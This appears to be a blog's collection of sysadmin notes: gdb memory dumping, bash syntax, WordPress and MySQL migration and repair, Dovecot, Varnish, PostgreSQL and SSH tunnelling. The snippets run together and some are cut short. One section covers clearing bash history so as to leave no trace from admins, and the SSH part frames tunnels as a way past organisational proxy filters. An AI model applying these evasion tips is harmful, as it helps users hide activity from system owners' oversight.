put this in a file (eg. "dump-all-memory-of-pid.sh") and make it executable
usage: ./dump-all-memory-of-pid.sh [pid]
The output is printed to files with the names: pid-startaddress-stopaddress.dump
Dependencies: gdb
get the pid of your process
pgrep -uroot process
dump the process's memory
mkdir /tmp/process_dump && cd /tmp/process_dump sh /path/to/dump-all-memory-of-pid.sh [pid]
expression1 && expression2 - true if both expression1 and expression2 are true.
if [ ! -z "$var" ] && [ -e "$var" ]; then
echo "'$var' is non-empty and the file exists"
fi
if [[ -n "$var" && -e "$var" ]] ; then
echo "'$var' is non-empty and the file exists"
fi
Subtract two variables in Bash :
count=$(($number1-$number2))
How to check if a string contains a substring in Bash :
string='My long string'
if [[ $string == *"My long"* ]]; then
echo "It's there!"
fi
string='My string';
if [[ $string =~ "My" ]]
then
echo "It's there!"
fi
if grep -q foo <<<"$string"; then
echo "It's there"
fi
Compare Numbers in Linux Shell Script :
$num1 -eq $num2 check if 1st number is equal to 2nd number $num1 -ge $num2 checks if 1st number is greater than or equal to 2nd number $num1 -gt $num2 checks if 1st number is greater than 2nd number $num1 -le $num2 checks if 1st number is less than or equal to 2nd number $num1 -lt $num2 checks if 1st number is less than 2nd number $num1 -ne $num2 checks if 1st number is not equal to 2nd number
Compare Strings in Linux Shell Script :
$var1 = $var2 checks if var1 is the same as string var2 $var1 != $var2 checks if var1 is not the same as var2 $var1 < $var2 checks if var1 is less than var2 $var1 > $var2 checks if var1 is greater than var2 -n $var1 checks if var1 has a length greater than zero -z $var1 checks if var1 has a length of zero
File comparison in Linux Shell Script
-d $file checks if the file exists and is it’s a directory -e $file checks if the file exists on system -w $file checks if the file exists on system and if it is writable -r $file checks if the file exists on system and it is readable -s $file checks if the file exists on system and it is not empty -f $file checks if the file exists on system and it is a file -O $file checks if the file exists on system and if it’s is owned by the current user -G $file checks if the file exists and the default group is the same as the current user -x $file checks if the file exists on system and is executable $fileA -nt $fileB checks if file A is newer than file B $fileA -ot $fileB checks if file A is older than file B
First, you need to create a new MySQL database on the new server and then perform the task of exporting old MySQL database from the old server to new database on the new server. You can modify all WordPress site URL’s in the MySQL database tables using PHPMyAdmin. Here are the steps to follow
Old URL http://oldsite.com
New URL http://newsite.com
Log into your PHPMyAdmin profile
Select the database you would like to edit
Execute the following SQL queries
#main replace
UPDATE wp_options SET option_value = replace(option_value, http://www.oldsite.com, http://www.newsite.com) WHERE option_name = home OR option_name = siteurl;
# replace www and non-ssl
UPDATE wp_posts SET guid = replace(guid, http://www.oldsite.com,http://www.newsite.com);
UPDATE wp_posts SET post_content = replace(post_content, http://www.oldsite.com, http://www.newsite.com);
UPDATE wp_postmeta SET meta_value = replace(meta_value, http://www.oldsite.com, http://www.newsite.com);
UPDATE wp_options SET option_value = replace(option_value, https://www.oldsite.com, http://www.newsite.com) WHERE option_name = home OR option_name = siteurl;
#replace www & SSL
UPDATE wp_posts SET guid = replace(guid, https://www.oldsite.com, https://www.newsite.com);
UPDATE wp_posts SET post_content = replace(post_content, https://www.oldsite.com, https://www.newsite.com);
UPDATE wp_postmeta SET meta_value = replace(meta_value, https://www.oldsite.com,https://www.newsite.com);
UPDATE wp_options SET option_value = replace(option_value, http://oldsite.com, https://newsite.com) WHERE option_name = home OR option_name = siteurl;
#replace non-www
UPDATE wp_posts SET guid = replace(guid, http://oldsite.com,http://newsite.com);
UPDATE wp_posts SET post_content = replace(post_content, http://oldsite.com, http://newsite.com);
UPDATE wp_postmeta SET meta_value = replace(meta_value, http://oldsite.com, http://newsite.com);
UPDATE wp_options SET option_value = replace(option_value, https://oldsite.com, http://newsite.com) WHERE option_name = home OR option_name = siteurl;
#replace non-www and SSL
UPDATE wp_posts SET guid = replace(guid, https://oldsite.com,https://newsite.com);
UPDATE wp_posts SET post_content = replace(post_content, https://oldsite.com, https://newsite.com);
UPDATE wp_postmeta SET meta_value = replace(meta_value, https://oldsite.com, https://newsite.com);
– Once you have modified the URL’s and table prefix, you can run the SQL query by pressing the Go button at the bottom.
The next step is updating your WordPress config file (wp-config.php) to reflect the above changes. The configuration file should be in your web document root. You need to change the username, password database name, and host values. Here are the steps to follow.
Updating your wp-config.php file
Using your hosting account editor, open your wp-config.php file.
Add two lines to the file which defines the new location of your website.
define(‘WP_HOME’,’http://mynewsite.com’);
define(‘WP_SITEURL’,’http:// mynewsite.com’);
Locate for a section that looks like this
define(‘DB_NAME’, ‘yourdbnamehere’);
/** MySQL database username */
define(‘DB_USER’, ”usernamehere’);
/** MySQL database password */
define(‘DB_PASSWORD’, ‘passwordhere’);
/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);
Note – enter the database information from your database as follows
yourdbnamehere= your MySQL database name
usernamehere is your MySQL Database Name
yourpasswordhere is your MySQL Password
localhost is your MySQL Host Name
Make sure that user listing is configured for your userdb, this is required by replication to find the list of users that are periodically replicated:
doveadm user '*'
this command must list all users.
I) Enable the replication plugin globally most likely you'll need to do this in 10-mail.conf : mail_plugins = $mail_plugins notify replication
II) Then in conf.d/30-dsync.conf :
service aggregator {
fifo_listener replication-notify-fifo {
user = vmail
}
unix_listener replication-notify {
user = vmail
}
}
service replicator {
process_min_avail = 1
unix_listener replicator-doveadm {
mode = 0600
user = vmail
}
}
replication_max_conns = 10
service doveadm {
user = vmail
inet_listener {
# port to listen on
port = $port
# enable SSL
ssl = yes
}
}
doveadm_port = $port
doveadm_password = "$password"
#same password on the other
plugin {
mail_replica = tcps:$targethostname:$port
#be sure to use the same name as the one provided for the ssl cert.
}
service config {
unix_listener config {
user = vmail
}
}
IV) service dovecot restart
V) Do the same for the other master and replace $targethostname by the 1st one you configured
VI) If configuration is done well, run the following to check the status of syncing, doveadm replicator status '*'
You should see the syncing is on progress.
doveadm replicator command :
Replicate a given email account manually doveadm replicator replicate 'email'
Replicate a given email account manually IN FULL doveadm replicator replicate -f 'email'
Check replication status. Also works without the email parameter. doveadm replicator status 'email'
In case if you have duplicates (use with care) : doveadm deduplicate -u user@domain.com -m ALL
I'll show you in this article an alternative to google docs : cryptpad.
In your entreprise you don't wan't your employee to share your documentation with someone external.
But many of them will use google docs if you don't deploy an alternative solution.
So google have access to all your informations.
Here come cryptpad ! it has word processing, sheets, code, kanban, presentation, whiteboard and even a drive !
The best of all, it is open source, actively maintained, and ... have client end encryption, more documentation here !
It's easily deployed in containers or in standard installation with node.
It's not providing anonymity but it's got a lot of qualities.
Wordpress vcl 4.0 : vcl 4.0;
# Based on: https://github.com/mattiasgeniar/varnish-4.0-configuration-templates/blob/master/default.vcl
import std;
import directors;
backend server1 { # Define one backend
.host = "127.0.0.1"; # IP or Hostname of backend
.port = "80"; # Port Apache or whatever is listening
.max_connections = 300; # That's it
.probe = {
#.url = "/"; # short easy way (GET /)
# We prefer to only do a HEAD /
.request =
"HEAD / HTTP/1.1"
"Host: localhost"
"Connection: close"
"User-Agent: Varnish Health Probe";
.interval = 5s; # check the health of each backend every 5 seconds
.timeout = 1s; # timing out after 1 second.
.window = 5; # If 3 out of the last 5 polls succeeded the backend is considered healthy, otherwise it will be marked as sick
.threshold = 3;
}
.first_byte_timeout = 300s; # How long to wait before we receive a first byte from our backend?
.connect_timeout = 5s; # How long to wait for a backend connection?
.between_bytes_timeout = 2s; # How long to wait between bytes received from our backend?
}
acl purge {
# ACL we'll use later to allow purges
"localhost";
"127.0.0.1";
"::1";
}
/*
acl editors {
# ACL to honor the "Cache-Control: no-cache" header to force a refresh but only from selected IPs
"localhost";
"127.0.0.1";
"::1";
}
*/
sub vcl_init {
# Called when VCL is loaded, before any requests pass through it.
# Typically used to initialize VMODs.
new vdir = directors.round_robin();
vdir.add_backend(server1);
# vdir.add_backend(server...);
# vdir.add_backend(servern);
}
sub vcl_recv {
# Called at the beginning of a request, after the complete request has been received and parsed.
# Its purpose is to decide whether or not to serve the request, how to do it, and, if applicable,
# which backend to use.
# also used to modify the request
set req.backend_hint = vdir.backend(); # send all traffic to the vdir director
# Normalize the header, remove the port (in case you're testing this on various TCP ports)
set req.http.Host = regsub(req.http.Host, ":[0-9]+", "");
# Remove the proxy header (see https://httpoxy.org/#mitigate-varnish)
unset req.http.proxy;
# Normalize the query arguments
set req.url = std.querysort(req.url);
# Allow purging
if (req.method == "PURGE") {
if (!client.ip ~ purge) { # purge is the ACL defined at the begining
# Not from an allowed IP? Then die with an error.
return (synth(405, "This IP is not allowed to send PURGE requests."));
}
# If you got this stage (and didn't error out above), purge the cached result
return (purge);
}
# Only deal with "normal" types
if (req.method != "GET" &&
req.method != "HEAD" &&
req.method != "PUT" &&
req.method != "POST" &&
req.method != "TRACE" &&
req.method != "OPTIONS" &&
req.method != "PATCH" &&
req.method != "DELETE") {
/* Non-RFC2616 or CONNECT which is weird. */
/*Why send the packet upstream, while the visitor is using a non-valid HTTP method? */
return (synth(404, "Non-valid HTTP method!"));
}
# Implementing websocket support (https://www.varnish-cache.org/docs/4.0/users-guide/vcl-example-websockets.html)
if (req.http.Upgrade ~ "(?i)websocket") {
return (pipe);
}
# Only cache GET or HEAD requests. This makes sure the POST requests are always passed.
if (req.method != "GET" && req.method != "HEAD") {
return (pass);
}
# Some generic URL manipulation, useful for all templates that follow
# First remove URL parameters used to track effectiveness of online marketing campaigns
if (req.url ~ "(\?|&)(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=") {
set req.url = regsuball(req.url, "(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=[-_A-z0-9+()%.]+&?", "");
set req.url = regsub(req.url, "[?|&]+$", "");
}
# Strip hash, server doesn't need it.
if (req.url ~ "\#") {
set req.url = regsub(req.url, "\#.*$", "");
}
# Strip a trailing ? if it exists
if (req.url ~ "\?$") {
set req.url = regsub(req.url, "\?$", "");
}
# Some generic cookie manipulation, useful for all templates that follow
# Remove the "has_js" cookie
set req.http.Cookie = regsuball(req.http.Cookie, "has_js=[^;]+(; )?", "");
# Remove any Google Analytics based cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_ga=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_gat=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=[^;]+(; )?", "");
# Remove DoubleClick offensive cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__gads=[^;]+(; )?", "");
# Remove the Quant Capital cookies (added by some plugin, all __qca)
set req.http.Cookie = regsuball(req.http.Cookie, "__qc.=[^;]+(; )?", "");
# Remove the AddThis cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=[^;]+(; )?", "");
# Remove a ";" prefix in the cookie if present
set req.http.Cookie = regsuball(req.http.Cookie, "^;\s*", "");
# Are there cookies left with only spaces or that are empty?
if (req.http.cookie ~ "^\s*$") {
unset req.http.cookie;
}
#if (req.http.Cache-Control ~ "(?i)no-cache") {
#if (req.http.Cache-Control ~ "(?i)no-cache" && client.ip ~ editors) { # create the acl editors if you want to restrict the Ctrl-F5
# http://varnish.projects.linpro.no/wiki/VCLExampleEnableForceRefresh
# Ignore requests via proxy caches and badly behaved crawlers
# like msnbot that send no-cache with every request.
# if (! (req.http.Via || req.http.User-Agent ~ "(?i)bot" || req.http.X-Purge)) {
# #set req.hash_always_miss = true; # Doesn't seems to refresh the object in the cache
# return (purge); # Couple this with restart in vcl_purge and X-Purge header to avoid loops
# }
#}
# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so set do_stream in vcl_backend_response()
if (req.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);
}
# Remove all cookies for static files
# A valid discussion could be held on this line: do you really need to cache static files that don't cause load? Only if you have memory left.
# Sure, there's disk I/O, but chances are your OS will already have these files in their buffers (thus memory).
# Before you blindly enable this, have a read here: https://ma.ttias.be/stop-caching-static-files/
if (req.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);
}
# Send Surrogate-Capability headers to announce ESI support to backend
set req.http.Surrogate-Capability = "key=ESI/1.0";
if (req.http.Authorization) {
# Not cacheable by default
return (pass);
}
return (hash);
}
sub vcl_pipe {
# Called upon entering pipe mode.
# In this mode, the request is passed on to the backend, and any further data from both the client
# and backend is passed on unaltered until either end closes the connection. Basically, Varnish will
# degrade into a simple TCP proxy, shuffling bytes back and forth. For a connection in pipe mode,
# no other VCL subroutine will ever get called after vcl_pipe.
# Note that only the first request to the backend will have
# X-Forwarded-For set. If you use X-Forwarded-For and want to
# have it set for all requests, make sure to have:
# set bereq.http.connection = "close";
# here. It is not set by default as it might break some broken web
# applications, like IIS with NTLM authentication.
# set bereq.http.Connection = "Close";
# Implementing websocket support (https://www.varnish-cache.org/docs/4.0/users-guide/vcl-example-websockets.html)
if (req.http.upgrade) {
set bereq.http.upgrade = req.http.upgrade;
}
return (pipe);
}
sub vcl_pass {
# Called upon entering pass mode. In this mode, the request is passed on to the backend, and the
# backend's response is passed on to the client, but is not entered into the cache. Subsequent
# requests submitted over the same client connection are handled normally.
# return (pass);
}
# The data on which the hashing will take place sub vcl_hash {
# Called after vcl_recv to create a hash value for the request. This is used as a key
# to look up the object in Varnish.
hash_data(req.url);
if (req.http.host) {
hash_data(req.http.host);
} else {
hash_data(server.ip);
}
# hash cookies for requests that have them
if (req.http.Cookie) {
hash_data(req.http.Cookie);
}
}
sub vcl_hit {
# Called when a cache lookup is successful.
if (obj.ttl >= 0s) {
# A pure unadultered hit, deliver it
return (deliver);
}
# https://www.varnish-cache.org/docs/trunk/users-guide/vcl-grace.html
# When several clients are requesting the same page Varnish will send one request to the backend and place the others on hold while fetching one copy from the backend. In some products this is called request coalescing and Varnish does this automatically.
# If you are serving thousands of hits per second the queue of waiting requests can get huge. There are two potential problems - one is a thundering herd problem - suddenly releasing a thousand threads to serve content might send the load sky high. Secondly - nobody likes to wait. To deal with this we can instruct Varnish to keep the objects in cache beyond their TTL and to serve the waiting requests somewhat stale content.
# We have no fresh fish. Lets look at the stale ones.
if (std.healthy(req.backend_hint)) {
# Backend is healthy. Limit age to 10s.
if (obj.ttl + 10s > 0s) {
#set req.http.grace = "normal(limited)";
return (deliver);
} else {
# No candidate for grace. Fetch a fresh object.
return (fetch);
}
} else {
# backend is sick - use full grace
if (obj.ttl + obj.grace > 0s) {
#set req.http.grace = "full";
return (deliver);
} else {
# no graced object.
return (fetch);
}
}
# fetch & deliver once we get the result
return (fetch); # Dead code, keep as a safeguard
}
sub vcl_miss {
# Called after a cache lookup if the requested document was not found in the cache. Its purpose
# is to decide whether or not to attempt to retrieve the document from the backend, and which
# backend to use.
return (fetch);
}
# Handle the HTTP request coming from our backend sub vcl_backend_response {
# Called after the response headers has been successfully retrieved from the backend.
# Pause ESI request and remove Surrogate-Control header
if (beresp.http.Surrogate-Control ~ "ESI/1.0") {
unset beresp.http.Surrogate-Control;
set beresp.do_esi = true;
}
# Enable cache for all static files
# The same argument as the static caches from above: monitor your cache size, if you get data nuked out of it, consider giving up the static file cache.
# Before you blindly enable this, have a read here: https://ma.ttias.be/stop-caching-static-files/
if (bereq.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;
}
# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so use streaming here to avoid locking.
if (bereq.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;
set beresp.do_stream = true; # Check memory usage it'll grow in fetch_chunksize blocks (128k by default) if the backend doesn't send a Content-Length header, so only enable it for big objects
}
# Sometimes, a 301 or 302 redirect formed via Apache's mod_rewrite can mess with the HTTP port that is being passed along.
# This often happens with simple rewrite rules in a scenario where Varnish runs on :80 and Apache on :8080 on the same box.
# A redirect can then often redirect the end-user to a URL on :8080, where it should be :80.
# This may need finetuning on your setup.
#
# To prevent accidental replace, we only filter the 301/302 redirects for now.
if (beresp.status == 301 || beresp.status == 302) {
set beresp.http.Location = regsub(beresp.http.Location, ":[0-9]+", "");
}
# Set 2min cache if unset for static files
if (beresp.ttl <= 0s || beresp.http.Set-Cookie || beresp.http.Vary == "*") {
set beresp.ttl = 120s; # Important, you shouldn't rely on this, SET YOUR HEADERS in the backend
set beresp.uncacheable = true;
return (deliver);
}
# Allow stale content, in case the backend goes down.
# make Varnish keep all objects for 6 hours beyond their TTL
set beresp.grace = 6h;
return (deliver);
}
# The routine when we deliver the HTTP request to the user
# Last chance to modify headers that are sent to the client sub vcl_deliver {
# Called before a cached object is delivered to the client.
if (obj.hits > 0) { # Add debug header to see if it's a HIT/MISS and the number of hits, disable when not needed
set resp.http.X-Cache = "HIT";
} else {
set resp.http.X-Cache = "MISS";
}
# Please note that obj.hits behaviour changed in 4.0, now it counts per objecthead, not per object
# and obj.hits may not be reset in some cases where bans are in use. See bug 1492 for details.
# So take hits with a grain of salt
set resp.http.X-Cache-Hits = obj.hits;
# Remove some headers: PHP version
unset resp.http.X-Powered-By;
# Remove some headers: Apache version & OS
unset resp.http.Server;
unset resp.http.X-Drupal-Cache;
unset resp.http.X-Varnish;
unset resp.http.Via;
unset resp.http.Link;
unset resp.http.X-Generator;
return (deliver);
}
sub vcl_purge {
# Only handle actual PURGE HTTP methods, everything else is discarded
if (req.method == "PURGE") {
# restart request
set req.http.X-Purge = "Yes";
return (restart);
}
}
sub vcl_synth {
if (resp.status == 720) {
# We use this special error status 720 to force redirects with 301 (permanent) redirects
# To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 301;
return (deliver);
} elseif (resp.status == 721) {
# And we use error status 721 to force redirects with a 302 (temporary) redirect
# To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 302;
return (deliver);
}
return (deliver);
}
sub vcl_fini {
# Called when VCL is discarded only after all requests have exited the VCL.
# Typically used to clean up VMODs.
Connect to database : $ psql \c databasename
Describe : \d
help : \?
Exit : \q
Creating Roles
Now the PostgreSQL allows access to database based on roles, they are similar to ‘users’ in Linux system. Also we can create a set of roles, which is similar to ‘groups’ in Linux & based on these roles, a user’s access is determined. A role created will be applied globally & we don’t have to create it again for another database on the same server.
To create a role, first connect to database & then we will use command ‘createuser’: postgres=# CREATE USER test;
Or we can also use the following, postgres=# CREATE ROLE test
To create a user with password, $ CREATE USER test PASSWORD ‘enter password here’
Check all roles postgres=# \du
Delete a role postgres=# DROP ROLE test;
Create a new Database postgres=# CREATE DATABASE sysa;
Delete a database postgres=# DROP DATABASE sysa;
List all database postgres=# \l
or postgres=# \list
Connect to a database $ sudo -i -u test
than connect to database the following command, $ psql -d sysa
Change to another database
Once connected to a database, we can also switch to another database without having to repeat the whole process of loggin into user & than connecting to different different database. We use the following command, sysa=> \connect new_database
Create Table
To create a table, first connect to the desired database where the table is to be created. Next create table with the command, sysa=> CREATE TABLE USERS (Serial_No int, First_Name varchar, Last_Name varchar);
Now insert some records into it, sysa=> INSERT INTO USERS VALUES (1, ‘Dan’, ‘Prince’);
Check the tables database sysa=> SELECT * FROM USERS ;
& it will produce all the inserted data from the table USERS.
Delete a table sysa=> DROP TABLE USERS:
List all the tables in a database sysa=> \dt
Adding a column to a table sysa=> ALTER TABLE USERS ADD date_of_birth date;
Updating a Row sysa=> UPDATE USERS SET date_of_birth = ‘05-09-1999’ WHERE Seriel_No = ‘1’; sysa=> SELECT * FROM USERS;
Remove a Column sysa=> ALTER TABLE USERS DROP date_of_birth;
Remove a Row sysa=> DELETE FROM USERS WHERE Seriel_No = ‘1’;
The tag can be any string, uppercase or lowercase, though most people use uppercase by convention.
The tag will not be considered as a Here tag if there are other words in that line. In this case, it will merely be considered part of the string. The tag should be by itself on a separate line, to be considered a tag.
The tag should have no leading or trailing spaces in that line to be considered a tag. Otherwise it will be considered as part of the string.
1. Assign multi-line string to a shell variable
$ sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'
EOF
)
The $sql variable now holds the new-line characters too. You can verify with echo -e "$sql".
2. Pass multi-line string to a file in Bash
$ cat <<EOF | grep 'b' | tee b.txt
foo
bar
baz
EOF
4.
$ cat >> test <<HERE
> Hello world HERE <-- Not by itself on a separate line -> not considered end of string
> This is a test
> HERE <-- Leading space, so not considered end of string
> and a new line
> HERE <-- Now we have the end of the string
5.
cat <<EOF >>brightup.sh
#!/bin/sh
# Created on $(date # : <<-- this will be evaluated before cat;)
echo "\$HOME will not be evaluated because it is backslash-escaped"
EOF
While I upgraded a MySQL 8 database to the latest version, I got an error with the sysconfig file in the sys table.
If your unable to start MySQL 8.
Even MySQL repair table was unable to repair the sys table.
You can try it but if it fail, here is the procedure to repair a failed upgrade for MySQL 8.
-Start MySQL
Add upgrade=MINIMAL in my.cnf file cause mysql_upgrade no longer exists. systemctl start mysqld
- First dump all databases:
mysqldump -u root -p --all-databases > alldb.sql
Look up the documentation for mysqldump. You may want to use some of the options mentioned in comments: mysqldump -u root -p --opt --all-databases > alldb.sql mysqldump -u root -p --all-databases --skip-lock-tables
Check if routines & triggers are also saved.
- Stop MySQL:
systemctl stop mysqld
- Remove all the database in the MySQL directory :
rm -rf database/*
- Reinitialise :
Remove upgrade=MINIMAL from my.cnf mysqld --initialize
Grab the new root password in the log file cat log/mysqld.log
- Start MySQL
systemctl start mysqld
- Change root password
mysql -u root -p
Enter temporary password
change the root password to the real one: ALTER USER 'root'@'localhost' IDENTIFIED BY 'PASSWORD';
- Import the databases
mysql -u root -p < alldb.sql
It's done now you've got a clean MySQL 8.
PS: I recommend you to dump your databases before an upgrade.
Logitech wireless devices have vulnerabilities and you need to patch your stuff yourself because the constructor doesn't really know which devices is patched ! Here the disclosure and the exploits Github repo.
A little article on zdnet
Tools for exploit
Here a tool for exploit the vulns another one here
Finally the patch
Finally logitech policy is cucumbersome and I don't recommend using logitech wireless devices.
Because the exploit seems to be working from 100 meters according to Mengs and logitech say you should protect access to your devices ?! here the patch
Last release of BlackArch download here version : 2020.12.01
A ChangeLog of the Full-ISO-2020.12.01:
- added more than 100 new tools
- renamed 'live-iso' to 'full-iso'
- updated blackarch-installer to v1.2.16
- included Linux kernel 5.9.11
- adapted ISO creaton the new archiso version (work in progress)
- removed unnecessary files from the ISO env
- QA'ed and fixed a lot of packages (runtime exec)
- updated all vim plugins and improved vim config options
- updated all blackarch tools and packages including config files
- updated all system packages
- updated all window manager menus (awesome, fluxbox, openbox)
Last release of Kali download here version : 2020.4
Last release of Parrot download here version : 2020-05 | Parrot 4.10
Last release of Backbox download here version : 2020-05-15 | Backbox linux 7
Clear Bash history completely :
Type the following command to clear all your Bash history: history -cw
-c Clear the history list
-w Write out the current history to the history file
Remove a certain line from Bash history :
Type the following command to remove a certain line (e.g. 352) from the Bash history file: history -dw 352
-d Delete specified line from the history
Clear current session history :
Type the following command to clear the Bash history of the current session only: history -r
Execute a command without saving it in the Bash history : 'space'command
Put a space in front of your command and it won’t be saved in the Bash history.
Don’t save commands in Bash history for current session : unset HISTFILE
Unsetting HISTFILE will cause any commands that you have executed in the current shell session not to be written in your bash_history file upon logout
Change in the current session the path of the history file : export HISTFILE=/dev/null
Three ways to Remove Only Current Session Bash History and Leave Older History Untouched : kill -9 $$ unset HISTFILE && exit history -r && exit
The commands below does not garanted you will left no trace.
Be aware that if you make a program/script listening to a port without hidding it, it can be monitored.
Also commands you type can also be monitored (the shell can be a chroot jail for example) and log can be send via a syslog server and/or admin can be notified so be carefulsource 1 source 2
!!:s/find/replace - last command, substitute find with replace
Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.)
For example:
echo 'one' 'two'
# "one two"
echo !!:2
# "two"
If you know the number given in the history for a particular command, you can pretty much take any argument in that command using following terms.
Use following to take the second argument from the third command in the history, !3:2
Use following to take the third argument from the fifth last command in the history, !-5:3
Using a minus sign, you ask it to traverse from the last command of the history.
var string = "foo",
substring = "oo";
string.includes(substring)
includes doesn’t have IE support, though. In an ES5 or older environment, String.prototype.indexOf, which returns −1 when it doesn’t find the substring, can be used instead:
var string = "foo",
substring = "oo";
string.indexOf(substring) !== -1
Note that this does not work in Internet Explorer or some other old browsers with no or incomplete ES6 support. To make it work in old browsers, you may wish to use a transpiler like Babel, a shim library like es6-shim, or this polyfill from MDN:
To change all permissions to the same type recursively: chmod -R 775 /folder To change all the directories to 755 (drwxr-xr-x): find /folder -type d -exec chmod 755 {} \; To change all the files to 644 (-rw-r--r--): find /folder -type f -exec chmod 644 {} \;
A SSH tunnel consists of an encrypted tunnel created through a SSH protocol connection. A SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example we can use a ssh tunnel to securely transfer files between a FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibits or filter certain internet services. For example an organization will block certain sites using their proxy filter. But users may not wish to have their web traffic
monitored or blocked by the organization proxy filter. If users can connect toan external SSH server, they can create a SSH tunnel to forward a given port on their local machine to port 80 on remote web-server via the external SSH server. I will describe this scenario in detail in a little while.
To set up a SSH tunnel a given port of one machine needs to be forwarded (of which I am going to talk about in a little while) to a port in the other machine which will be the other end of the tunnel. Once the SSH tunnel has been established, the user can connect to earlier specified port at first machine to access the network service.
Port Forwarding
SSH tunnels can be created in several ways using different kinds of port forwardingmechanisms. Ports can be forwarded in three ways.
Local port forwarding
Remote port forwarding
Dynamic port forwarding
I didn’t explain what port forwarding is. I found Wikipedia’s definition more explanatory.
Port forwarding or port mapping is a name given to the combined technique of
translating the address and/or port number of a packet to a new destination
possibly accepting such packet(s) in a packet filter(firewall)
forwarding the packet according to the routing table.
Here the first technique will be used in creating an SSH tunnel. When a client application connects to the local port (local endpoint) of the SSH tunnel and transfer data these data will be forwarded to the remote end by translating the host and port values to that of the remote end of the channel.
So with that let’s see how SSH tunnels can be created using forwarded ports with an examples.
Tunnelling with Local port forwarding
Let’s say that yahoo.com is being blocked using a proxy filter in the University. (For the sake of this example. :). Cannot think any valid reason why yahoo would be blocked). A SSH tunnel can be used to bypass this restriction. Let’s name my machine at the university as ‘work’ and my home machine as ‘home’. ‘home’ needs to have a public IP for this to work. And I am running a SSH server on my home machine. Following diagram illustrates the scenario.
To create the SSH tunnel execute following from ‘work’ machine.
ssh -L 9001:yahoo.com:80 home
The ‘L’ switch indicates that a local port forward is need to be created. The switch syntax is as follows.
Now the SSH client at ‘work’ will connect to SSH server running at ‘home’ (usually running at port 22) binding port 9001 of ‘work’ to listen for local requests thus creating a SSH tunnel between ‘home’ and ‘work’. At the ‘home’ end it will create a connection to ‘yahoo.com’ at port 80. So ‘work’ doesn’t need to know how to connect to yahoo.com. Only ‘home’ needs to worry about that. The channel between ‘work’ and ‘home’ will be encrypted while the connection between ‘home’ and ‘yahoo.com’ will be unencrypted.
Now it is possible to browse yahoo.com by visiting http://localhost:9001 in the web browser at ‘work’ computer. The ‘home’ computer will act as a gateway which would accept requests from ‘work’ machine and fetch data and tunnelling it back. So the syntax of the full command would be as follows.
Here the ‘host’ to ‘yahoo.com’ connection is only made when browser makes the request not at the tunnel setup time.
It is also possible to specify a port in the ‘home’ computer itself instead of connecting to an external host. This is useful if I were to set up a VNC session between ‘work’ and ‘home’. Then the command line would be as follows.
ssh -L 5900:localhost:5900 home (Executed from 'work')
So here what does localhost refer to? Is it the ‘work’ since the command line is executed from ‘work’? Turns out that it is not. As explained earlier is relative to the gateway (‘home’ in this case) , not the machine from where the tunnel is initiated. So this will make a connection to port 5900 of the ‘home’ computer where the VNC client would be listening in.
The created tunnel can be used to transfer all kinds of data not limited to web browsing sessions. We can also tunnel SSH sessions from this as well. Let’s assume there is another computer (‘banned’) to which we need to SSH from within University but the SSH access is being blocked. It is possible to tunnel a SSH session to this host using a local port forward. The setup would look like this.
As can be seen now the transferred data between ‘work’ and ‘banned’ are encrypted end to end. For this we need to create a local port forward as follows.
ssh -L 9001:banned:22 home
Now we need to create a SSH session to local port 9001 from where the session will get tunneled to ‘banned’ via ‘home’ computer.
ssh -p 9001 localhost
With that let’s move on to next type of SSH tunnelling method, reverse tunnelling.
Reverse Tunnelling with remote port forwarding
Let’s say it is required to connect to an internal university website from home. The university firewall is blocking all incoming traffic. How can we connect from ‘home’ to internal network so that we can browse the internal site? A VPN setup is a good candidate here. However for this example let’s assume we don’t have this facility. Enter SSH reverse tunnelling..
